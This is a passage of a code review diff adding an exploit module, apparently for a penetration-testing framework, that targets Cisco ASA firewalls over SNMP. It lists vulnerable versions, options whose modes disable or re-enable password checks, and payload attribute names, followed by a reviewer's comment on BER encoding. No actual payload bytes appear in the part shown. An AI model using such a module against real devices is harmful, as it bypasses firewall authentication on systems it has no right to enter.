modules/exploits/firewall/extrabacon.rb

```diff
@@ -0,0 +1,371 @@
+        ['Cisco Adaptive Security Appliance Version 8.2(3)', { 'Version' => "asa823" }],
+        ['Cisco Adaptive Security Appliance Version 8.2(4)', { 'Version' => "asa824" }],
+        ['Cisco Adaptive Security Appliance Version 8.2(5)', { 'Version' => "asa825" }],
+        ['Cisco Adaptive Security Appliance Version 8.3(1)', { 'Version' => "asa831" }],
+        ['Cisco Adaptive Security Appliance Version 8.3(2)', { 'Version' => "asa832" }],
+        ['Cisco Adaptive Security Appliance Version 8.4(1)', { 'Version' => "asa841" }],
+        ['Cisco Adaptive Security Appliance Version 8.4(2)', { 'Version' => "asa842" }],
+        ['Cisco Adaptive Security Appliance Version 8.4(3)', { 'Version' => "asa843" }],
+        ['Cisco Adaptive Security Appliance Version 8.4(4)', { 'Version' => "asa844" }],
+      ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 15 2016'))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, "Destination port on target", 161]),
+        OptString.new('RHOST', [true, "IP address of the target ASA", '']),
+        OptString.new('Community', [true, "Community string", '']),
+        OptBool.new('Verbose', [ true, 'Set verbose output on/off', true ]),
+        OptEnum.new('Mode', [true, 'The exploit operation',  'pass-disable',
+                                                                  [
+                                                                    'pass-disable',
+                                                                    'pass-enable'
+                                                                  ]
+                                                                ]),
+      ], self.class)
+
+  end
+
+  BaconWrapped = Object::Module.new do
+    attr_reader(
+        :vers,
+        :my_ret_addr_byte,
+        :my_ret_addr_snmp,
+        :my_ret_addr_len,
+        :finder_byte,
+        :finder_snmp,
+        :finder_len,
+        :preamble_byte,
+        :preamble_snmp,
+        :preamble_len,
+        :postscript_byte,
+        :postscript_snmp,
+        :postscript_len,
+        :launcher_byte,
+        :launcher_snmp,
+        :launcher_len,
+        :payload_PMCHECK_ENABLE_byte,
+        :payload_PMCHECK_ENABLE_snmp,
+        :payload_PMCHECK_ENABLE_len,
+        :payload_PMCHECK_DISABLE_byte,
+        :payload_PMCHECK_DISABLE_snmp,
+        :payload_PMCHECK_DISABLE_len,
+        :payload_AAAADMINAUTH_ENABLE_byte,
+        :payload_AAAADMINAUTH_ENABLE_snmp,
+        :payload_AAAADMINAUTH_ENABLE_len,
+        :payload_AAAADMINAUTH_DISABLE_byte,
+        :payload_AAAADMINAUTH_DISABLE_snmp,
+        :payload_AAAADMINAUTH_DISABLE_len,
+        :retn
+      )
+  end
+
+  class ExtraBacon
+    include BaconWrapped
+  end
+
+  # ruby-snmp allows no fun at all with regards to type validation, so instead of
+  # over-riding multiple classes and breaking everything, we use our own routines,
+  # borrowing heavily from ruby-net-ldap
+
+  def ber_encode(x)
```

Comment:
The OpenSSL API includes a nice BER encoder (its what we use in the SNMP modules elsewhere).